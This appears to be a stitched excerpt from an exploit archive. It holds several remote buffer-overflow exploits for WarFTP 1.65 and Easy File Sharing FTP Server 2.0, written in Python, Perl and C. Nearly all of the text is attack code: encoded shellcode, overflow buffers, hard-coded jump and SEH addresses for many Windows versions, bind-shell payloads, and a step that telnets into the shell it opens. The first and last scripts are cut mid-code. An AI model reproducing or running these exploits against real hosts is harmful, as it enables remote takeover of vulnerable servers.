shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x36\x4b\x4e"
shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x46\x4b\x58"
shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x 4b\x48\x4e\x57"
shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x 4a\x51\x4b\x38"
shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x 46\x33\x4b\x58"
shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x 46\x48\x42\x4c"
shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x 44\x4c\x4b\x4e"
shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x 45\x4e\x4b\x48"
shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x 4e\x50\x4b\x54"
shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x 4e\x32\x4b\x58"
shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x 41\x53\x4b\x4d"
shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x 4e\x30\x4b\x38"
shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x 50\x55\x4a\x56"
shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x 48\x4d\x48\x36"
shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x 47\x37\x43\x57"
shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x 4b\x4c\x4d\x4e"
shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x 49\x38\x45\x4e"
shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x 4c\x36\x44\x30"
shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x 4d\x4a\x47\x35"
shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x 43\x35\x43\x34"
shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x 4a\x36\x41\x41"
shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x 4a\x56\x46\x4a"
shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x 4c\x46\x42\x31"
shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x 4d\x4a\x50\x42"
shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x 4f\x4f\x42\x4d"
shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x 4f\x4f\x48\x4d"
shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x 43\x39\x4a\x56"
shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x 48\x4d\x45\x45"
shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x 4a\x46\x43\x46"
shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x 49\x52\x4e\x4c"
shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x 41\x53\x42\x4c"
shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x 44\x34\x4e\x32"
shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x36"
shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x 46\x34\x4f\x4f"
shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x 41\x55\x4c\x36"
shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x 42\x4d\x4a\x56"
shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x 48\x4d\x4c\x56"
shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x 47\x55\x4e\x4f"
shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x 4f\x4f\x42\x4d"
shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x 4f\x4f\x48\x4d"
shellcode += "\x4f\x4f\x42\x4d\x5a\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
def ConnectRemoteShell(target):
connect = "/usr/bin/telnet " + target + " 4444"
os.system(connect)
def ExploitFTP(target):
sockAddr = (target, 21)
tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tsock.connect(sockAddr)
response = tsock.recv(1024)
# At the time of overflow EBP points to our shellcode
payload = "USER "
payload += "A" * 485
# Point of EIP overwrite. Address of 'call ebp' from user32.dll SP4.
payload += struct.pack("<L", 0x77E14709)
payload += "\x90" * 100
payload += shellcode
payload += "\r\n"
tsock.send(payload)
if __name__ == '__main__':
try:
target = sys.argv[1]
except IndexError:
print 'Usage: %s <target>' % sys.argv[0]
sys.exit(-1)
ExploitFTP(target)
time.sleep(2)
ConnectRemoteShell(target)
# [2007-03-14]
21 WarFTP 1.65 (USER) Remote Buffer Overflow SEH Overflow Exploit
# ================================================== =============================================
# WarFTP 1.65 (USER) Remote Buffer Overflow SEH overflow Exploit
# By Umesh Wanve
# ================================================== =============================================
#
# Date : 15-03-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Well I used different technique here. Rather than overwriting EIP, I used SEH handler overwrite
# method. Preety simple.
#
# Stack ---> buffer === AAAAA.........
# |
# Pointer to next SEH === Short Jump to Hellcode
# |
# SEH Handler === Pop, Pop, Ret (ws2help.dll win2000 sp4)
# |
# NOP Sled === Nop Sled
# |
# Hellcode === Hell.........
#
#
#
#
# P.S: This was written for educational purpose. Use it at your own risk.Author will be not be
# responsible for any damage.
#
# Always Thanks to Metasploit.
#
#================================================= =================================================
#!/usr/bin/perl
use IO::Socket;
#use strict;
# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
my($shellcode)=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x 51\x5a\x6a\x42".
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x 41\x42\x41\x32".
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x 69\x79\x6c\x4a".
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x 35\x45\x6c\x4c".
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x 4b\x70\x4f\x57".
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x 39\x4c\x4b\x50".
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x 79\x6e\x4c\x4d".
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x 6d\x37\x71\x6f".
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x 54\x72\x55\x7a".
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x 76\x4c\x4b\x76".
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x 6b\x4c\x4b\x65".
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x 74\x46\x64\x78".
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x 70\x4c\x45\x4f".
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x 6b\x30\x70\x65".
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x 59\x4c\x4b\x4d".
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x 38\x57\x4c\x31".
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x 58\x6e\x63\x69".
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x 64\x63\x6f\x61".
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x 4f\x4b\x57\x70".
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";
my($pointer_to_next_seh)="\xeb\x06\x90\x90"; # Short Jump
my($seh_handler)="\xa9\x11\x02\x75"; #pop, pop, ret
#(ws2help.dll win2000 sp4)
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "21",
Proto => "TCP"))
{
$exploit = "USER ". #Vulnerable Command
("A"x485). #Buffer
"BBBB". #EIP Overwrites here :)
("\x90" x 80). #Garbage
$pointer_to_next_seh.
$seh_handler.
("\x90" x 10).
$shellcode. #ur code
("\x90" x 10).
"\r\n";
print $socket $exploit;
sleep(1);
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:21\n";
}
# [2007-03-15]
21 WarFTP 1.65 (USER) Remote Buffer Overlow Exploit (multiple targets)
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#define VULNSERVER "WAR-FTPD 1.65"
#define VULNCMD "\x55\x53\x45\x52\x20"
#define ZERO '\x00'
#define NOP '\x90'
#define VULNBUFF 485
#define BUFFREAD 128
#define PORT 21
#define LENJMPESP 4
/* ################################################## ###########################
##### #####
##### WARFTP - VERSION 1.65 #####
##### #####
##### WarFTP Username Stack-Based Buffer-Overflow Vulnerability #####
##### #####
##### DESCRIPTION: WarFTP is prone to a stack-based buffer-overflow #####
##### vulnerability because it fails to properly check boundaries #####
##### on user-supplied data before copying it to an insufficiently #####
##### sized buffer. #####
##### #####
##### FUNC VULNERABLE: sprintf(char *buffer, const char *format, argv) #####
##### 0x004044E7: sprintf(0x00ACFB50, "%sCRLF", ExploitBuffer) #####
##### #####
##### AFFECTED VERSION: 1.65 #####
##### USE: warftphack.exe IP_ADDRESS SO_&_SERVICE_PACK [ ESP ADDRESS ] #####
##### SO_&_SERVICE_PACK: #####
##### [0] Microsoft Windows XP Pro Spanish SP0 #####
##### [1] Microsoft Windows XP Pro Spanish SP1 #####
##### [2] Microsoft Windows XP Pro Spanish SP2 #####
##### [3] Microsoft Windows XP Pro English SP0 #####
##### [4] Microsoft Windows XP Pro English SP1 #####
##### [5] Microsoft Windows XP Pro English SP2 #####
##### [6] Microsoft Windows 2000 Pro Spanish SP0 #####
##### [7] Microsoft Windows 2000 Pro Spanish SP1 #####
##### [8] Microsoft Windows 2000 Pro Spanish SP2 #####
##### [9] Microsoft Windows 2000 Pro Spanish SP3 #####
##### [10] Microsoft Windows 2000 Pro English SP0 #####
##### [11] Microsoft Windows 2000 Pro English SP1 #####
##### [12] Microsoft Windows 2000 Pro English SP2 #####
##### [13] Microsoft Windows 2000 Pro English SP3 #####
##### [14] Custom -> JMP ESP ADDRESS #####
##### #####
##### EXAMPLE: warftphack.exe 127.0.0.1 2 #####
##### EXAMPLE2: warftphack.exe 127.0.0.1 14 0x776EDDFF #####
##### #####
##### AUTOR: niXel - SYSCODE (SPAIN) #####
##### IDE: Dev-C ver-4.9.9.2 #####
##### COMPILER: MinGW #####
##### DEPENDENCES: Linker -> libwsock32.a #####
##### MAIL: [email protected] #####
##### #####
################################################## ###########################
CAUTION: USER command vulnerable => no send \x40 (@) char into shellcode (user@host)
no send \x0A (\n) char into shellcode
no send \x0D (\r) char into shellcode
FUNCTION sprintf => no send \x00 (\0) char into shellcode
############################ BINDSHELLCODE ##############################
[7777] */
char syscode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49"
"\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x 51\x5a\x6a\x61"
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x71\x32\x 41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x 39\x4b\x4c\x32"
"\x4a\x5a\x4b\x50\x4d\x6d\x38\x6b\x49\x49\x6f\x59\x 6f\x39\x6f\x35"
"\x30\x6c\x4b\x70\x6c\x65\x74\x37\x54\x4c\x4b\x42\x 65\x47\x4c\x6e"
"\x6b\x31\x6c\x46\x65\x33\x48\x43\x31\x48\x6f\x6c\x 4b\x70\x4f\x65"
"\x48\x6c\x4b\x73\x6f\x35\x70\x37\x71\x38\x6b\x31\x 59\x4c\x4b\x46"
"\x54\x6e\x6b\x53\x31\x58\x6e\x30\x31\x6f\x30\x4f\x 69\x4e\x4c\x4b"
"\x34\x49\x50\x41\x64\x46\x67\x49\x51\x7a\x6a\x46\x 6d\x43\x31\x48"
"\x42\x5a\x4b\x38\x74\x47\x4b\x30\x54\x64\x64\x51\x 38\x42\x55\x4b"
"\x55\x4e\x6b\x53\x6f\x51\x34\x43\x31\x4a\x4b\x50\x 66\x4e\x6b\x46"
"\x6c\x42\x6b\x4c\x4b\x73\x6f\x75\x4c\x33\x31\x5a\x 4b\x65\x53\x34"
"\x6c\x6e\x6b\x6d\x59\x30\x6c\x57\x54\x55\x4c\x55\x 31\x4b\x73\x74"
"\x71\x69\x4b\x65\x34\x6e\x6b\x43\x73\x74\x70\x6c\x 4b\x67\x30\x46"
"\x6c\x6c\x4b\x70\x70\x67\x6c\x6e\x4d\x6c\x4b\x57\x 30\x44\x48\x71"
"\x4e\x72\x48\x4e\x6e\x50\x4e\x54\x4e\x38\x6c\x70\x 50\x4b\x4f\x4e"
"\x36\x71\x76\x41\x43\x31\x76\x31\x78\x76\x53\x30\x 32\x53\x58\x30"
"\x77\x44\x33\x57\x42\x63\x6f\x70\x54\x6b\x4f\x48\x 50\x73\x58\x58"
"\x4b\x58\x6d\x6b\x4c\x57\x4b\x70\x50\x6b\x4f\x6a\x 76\x71\x4f\x6d"
"\x59\x4b\x55\x65\x36\x6c\x41\x68\x6d\x53\x38\x63\x 32\x42\x75\x51"
"\x7a\x36\x62\x59\x6f\x58\x50\x71\x78\x4a\x79\x34\x 49\x4b\x45\x6e"
"\x4d\x30\x57\x69\x6f\x4e\x36\x52\x73\x41\x43\x62\x 73\x76\x33\x51"
"\x43\x70\x43\x43\x63\x73\x73\x36\x33\x6b\x4f\x4a\x 70\x75\x36\x41"
"\x78\x75\x4e\x71\x71\x35\x36\x42\x73\x4b\x39\x79\x 71\x6c\x55\x70"
"\x68\x4f\x54\x75\x4a\x32\x50\x39\x57\x52\x77\x69\x 6f\x38\x56\x70"
"\x6a\x72\x30\x50\x51\x53\x65\x4b\x4f\x58\x50\x55\x 38\x6c\x64\x4c"
"\x6d\x34\x6e\x49\x79\x66\x37\x6b\x4f\x4e\x36\x50\x 53\x30\x55\x69"
"\x6f\x4a\x70\x53\x58\x7a\x45\x41\x59\x4e\x66\x37\x 39\x36\x37\x69"
"\x6f\x59\x46\x72\x70\x50\x54\x31\x44\x33\x65\x4b\x 4f\x5a\x70\x4f"
"\x63\x51\x78\x38\x67\x50\x79\x38\x46\x43\x49\x32\x 77\x4b\x4f\x4b"
"\x66\x62\x75\x79\x6f\x6a\x70\x45\x36\x30\x6a\x52\x 44\x30\x66\x41"
"\x78\x32\x43\x72\x4d\x6f\x79\x6d\x35\x62\x4a\x42\x 70\x70\x59\x74"
"\x69\x5a\x6c\x6c\x49\x6b\x57\x41\x7a\x32\x64\x6b\x 39\x68\x62\x30"
"\x31\x6f\x30\x6b\x43\x6e\x4a\x6b\x4e\x51\x52\x34\x 6d\x49\x6e\x62"
"\x62\x36\x4c\x5a\x33\x6c\x4d\x71\x6a\x65\x68\x6e\x 4b\x4c\x6b\x4e"
"\x4b\x55\x38\x30\x72\x59\x6e\x4c\x73\x37\x66\x4b\x 4f\x30\x75\x63"
"\x74\x39\x6f\x6e\x36\x33\x6b\x36\x37\x72\x72\x31\x 41\x31\x41\x46"
"\x31\x50\x6a\x55\x51\x31\x41\x41\x41\x32\x75\x42\x 71\x39\x6f\x48"
"\x50\x50\x68\x6c\x6d\x39\x49\x45\x55\x78\x4e\x30\x 53\x39\x6f\x6b"
"\x66\x62\x4a\x79\x6f\x39\x6f\x47\x47\x39\x6f\x58\x 50\x4e\x6b\x50"
"\x57\x4b\x4c\x6c\x43\x4b\x74\x70\x64\x6b\x4f\x6a\x 76\x41\x42\x49"
"\x6f\x58\x50\x30\x68\x68\x6f\x6a\x6e\x4b\x50\x31\x 70\x42\x73\x49"
"\x6f\x58\x56\x49\x6f\x78\x50\x61";
int main(int argc, char ** argv) {
char buffRead[BUFFREAD], jmpESP[LENJMPESP], ch, ch2;
char * pbuffSend;
unsigned int err = 0, i, k;
int sockData, j;
struct sockaddr_in their_addr;
WSADATA wsaData;
system("cls");
fprintf(stdout, "\n\tWarFTP Username Stack-Based Buffer-Overflow Vulnerability\n");
fprintf(stdout, " __________________________________________________ __________________\n\n");
if (((argc == 3) && (atoi(argv[2]) >= 0) && (atoi(argv[2]) < 14)) || ((argc == 4) && (atoi(argv[2]) == 14))) {
if (WSAStartup(MAKEWORD(2, 0), &wsaData) == 0) {
if ((sockData = socket(AF_INET, SOCK_STREAM, 0)) != -1) {
/* Server data struct */
their_addr.sin_family = AF_INET; // ; Family AF_INET
their_addr.sin_addr.s_addr = inet_addr(argv[1]); // ; IP Address = Argv[1]
their_addr.sin_port = htons(PORT); // ; Port = 21
memset(&(their_addr.sin_zero), '0', 8); // ; IP:Port = Argv[1]:21
if (connect(sockData, (struct sockaddr *) &their_addr, sizeof(struct sockaddr)) != -1) {
recv(sockData, buffRead, BUFFREAD, 0);
buffRead[BUFFREAD - 1] = ZERO;
if (strstr(buffRead, VULNSERVER) != NULL) {
/* ################################################## ###############################
##### BufferSend -> "USER A*VULNBUFF @JMP_ESP \x90\x90\x90\x90 SYSCODE \r\n #####
################################################## ############################### */
pbuffSend = (char *) malloc(strlen(VULNCMD) + VULNBUFF + LENJMPESP + (sizeof(char) * 4) + strlen(syscode) + (sizeof(char) * 2));
if (pbuffSend != NULL) {
for (i=0; i < strlen(VULNCMD); i++) *(pbuffSend + i) = VULNCMD[i];
for (j=0; j < VULNBUFF; i++, j++) *(pbuffSend + i) = '\x41';
/* - OPcodes from ntdll.dll -> JMP ESP - */
switch(atoi(argv[2])) {
case 0: memcpy(jmpESP, "\xE3\x39\xF4\x77", LENJMPESP); break;
case 1: memcpy(jmpESP, "\x0F\x98\xF8\x77", LENJMPESP); break;
case 2: memcpy(jmpESP, "\xED\x1E\x95\x7C", LENJMPESP); break;
case 3: memcpy(jmpESP, "\xE3\x39\xF4\x77", LENJMPESP); break;
case 4: memcpy(jmpESP, "\xCC\x59\xFA\x77", LENJMPESP); break;
case 5: memcpy(jmpESP, "\xED\x1E\x95\x7C", LENJMPESP); break;
case 6: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 7: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 8: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 9: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 10: memcpy(jmpESP, "\x8B\x94\xF8\x77", LENJMPESP); break;
case 11: memcpy(jmpESP, "\xAB\x67\xF9\x77", LENJMPESP); break;
case 12: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 13: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 14:
k = 0;
if ((strncmp(argv[3], "0x", (sizeof(char) * 2)) == 0) && (strlen(argv[3]) == 10)) {
for (j=(sizeof(char) * 8) - 1; ((j >= 0) && (!err)); j--) {
ch = *(argv[3] + j + 2);
if (((ch > 47) && (ch < 58)) || ((ch > 64) && (ch < 71)) || ((ch > 96) && (ch < 103))) {
if ((ch > 47) && (ch < 58)) ch -= 48;
else if ((ch > 64) && (ch < 71)) ch -= 55;
else ch -= 87;
if ((j % 2) == 0) jmpESP[k++] = ((ch <<= 4) | ch2);
else ch2 = ch;
}
else { fprintf(stderr, "\t[ ERROR ] Three parameter syntax error\n\t[ ERROR ] Example: 0xFFFFFFFF\n"); err = 1; }
}
}
else { fprintf(stderr, "\t[ ERROR ] Three parameter syntax error\n\t[ ERROR ] Example: 0xFFFFFFFF\n"); err = 1; }
}
if (!err) {
for (j=0; j < LENJMPESP; i++, j++) *(pbuffSend + i) = jmpESP[j];
for (j=0; j < (sizeof(char) * 4); i++, j++) *(pbuffSend + i) = NOP;
for (j=0; j < strlen(syscode); i++, j++) *(pbuffSend + i) = syscode[j];
memcpy(pbuffSend + i, "\r\n", (sizeof(char) * 2));
if (i == send(sockData, pbuffSend, ++i, 0)) {
fprintf(stdout, "\t[ OK ] Exploit buffer send to %s:%d\n", argv[1], PORT);
fprintf(stdout, "\t[ OK ] If you have not chosen a correct operating system and\n\t service pack you can cause a D.O.S\n");
fprintf(stdout, "\t[ OK ] Connect: telnet %s 7777\n", argv[1]);
}
else fprintf(stderr, "\t[ ERROR ] No sending all exploit buffer\n");
}
free(pbuffSend);
}
else fprintf(stderr, "\t[ ERROR ] No allocate memory\n");
}
else fprintf(stderr, "\t[ ERROR ] Not a vulnerable server\n");
}
else fprintf(stderr, "\t[ ERROR ] Connect to %s:%d\n", argv[1], PORT);
closesocket(sockData);
}
else fprintf(stderr, "\t[ ERROR ] Create local socket\n");
WSACleanup();
}
else fprintf(stderr, "\t[ ERROR ] Load library");
}
else {
fprintf(stderr, " [ + ] USE: %s IP_ADDRESS SERVICE_PACK [ ESP_ADDRESS ]\n\n", argv[0]);
fprintf(stderr, " [ + ] SERVICE PACK: [ - ] Microsoft Windows XP Pro Spanish SP0 (0)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro Spanish SP1 (1)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro Spanish SP2 (2)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP0 (3)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP1 (4)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP2 (5)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP0 (6)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP1 (7)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP2 (8)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP3 (9)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP0 (10)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP1 (11)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP2 (12)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP3 (13)\n");
fprintf(stderr, "\t\t\t[ - ] Custom Service Pack - JMP %%ESP (14)\n\n");
fprintf(stderr, " [ + ] EXAMPLE: %s 127.0.0.1 2\n", argv[0]);
fprintf(stderr, " [ + ] EXAMPLE2: %s 127.0.0.1 14 0x776EDDFF\n", argv[0]);
}
fprintf(stdout, " __________________________________________________ _________________\n\n");
return 0;
}
// [2007-03-25]
21 Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (Win2K SP4)
#!/usr/bin/python
# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability
# was discovered by h07 and a POC for windows XP SP2 (polish version) was
# provided. This exploit was tested on windows 2000 server SP4. The exploit
# binds a shell on TCP port 4444.
#
# Author shall bear no responsibility for any screw ups
# Winny Thomas :-)
import os
import sys
import time
import struct
import socket
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x56\x4b\x4e"
shellcode += "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x46\x4b\x48"
shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x48\x45\x34\x4e\x33\x 4b\x38\x4e\x37"
shellcode += "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x 4a\x31\x4b\x38"
shellcode += "\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x38\x 46\x33\x4b\x38"
shellcode += "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x 46\x58\x42\x4c"
shellcode += "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x 44\x4c\x4b\x4e"
shellcode += "\x46\x4f\x4b\x43\x46\x35\x46\x32\x4a\x52\x45\x47\x 45\x4e\x4b\x58"
shellcode += "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x58\x 4e\x30\x4b\x34"
shellcode += "\x4b\x38\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x30\x 4e\x42\x4b\x48"
shellcode += "\x49\x38\x4e\x46\x46\x52\x4e\x31\x41\x36\x43\x4c\x 41\x43\x4b\x4d"
shellcode += "\x46\x36\x4b\x48\x43\x34\x42\x53\x4b\x48\x42\x44\x 4e\x50\x4b\x58"
shellcode += "\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x 50\x55\x4a\x56"
shellcode += "\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x 48\x4d\x48\x36"
shellcode += "\x43\x35\x48\x36\x4a\x36\x43\x43\x44\x43\x4a\x36\x 47\x37\x43\x57"
shellcode += "\x44\x53\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x 4b\x4c\x4d\x4e"
shellcode += "\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x 49\x48\x45\x4e"
shellcode += "\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x30\x45\x55\x 4c\x56\x44\x30"
shellcode += "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x50\x45\x4f\x 4d\x4a\x47\x55"
shellcode += "\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x45\x43\x35\x 43\x35\x43\x44"
shellcode += "\x43\x55\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x46\x 4a\x56\x41\x31"
shellcode += "\x4e\x45\x48\x36\x43\x55\x49\x58\x41\x4e\x45\x39\x 4a\x56\x46\x4a"
shellcode += "\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x 4c\x46\x42\x31"
shellcode += "\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x 4d\x4a\x50\x42"
shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x45\x45\x35\x 4f\x4f\x42\x4d"
shellcode += "\x4a\x46\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x45\x 4f\x4f\x48\x4d"
shellcode += "\x42\x35\x46\x45\x46\x55\x45\x45\x4f\x4f\x42\x4d\x 43\x59\x4a\x56"
shellcode += "\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x 48\x4d\x45\x55"
shellcode += "\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x46\x48\x46\x 4a\x36\x43\x46"
shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x46\x42\x35\x49\x35\x 49\x32\x4e\x4c"
shellcode += "\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x38\x44\x4e\x 41\x53\x42\x4c"
shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x 44\x44\x4e\x32"
shellcode += "\x43\x59\x4d\x38\x4c\x57\x4a\x33\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x46"
shellcode += "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x 46\x34\x4f\x4f"
shellcode += "\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x45\x41\x45\x 41\x55\x4c\x36"
shellcode += "\x41\x30\x41\x35\x41\x45\x45\x45\x41\x45\x4f\x4f\x 42\x4d\x4a\x46"
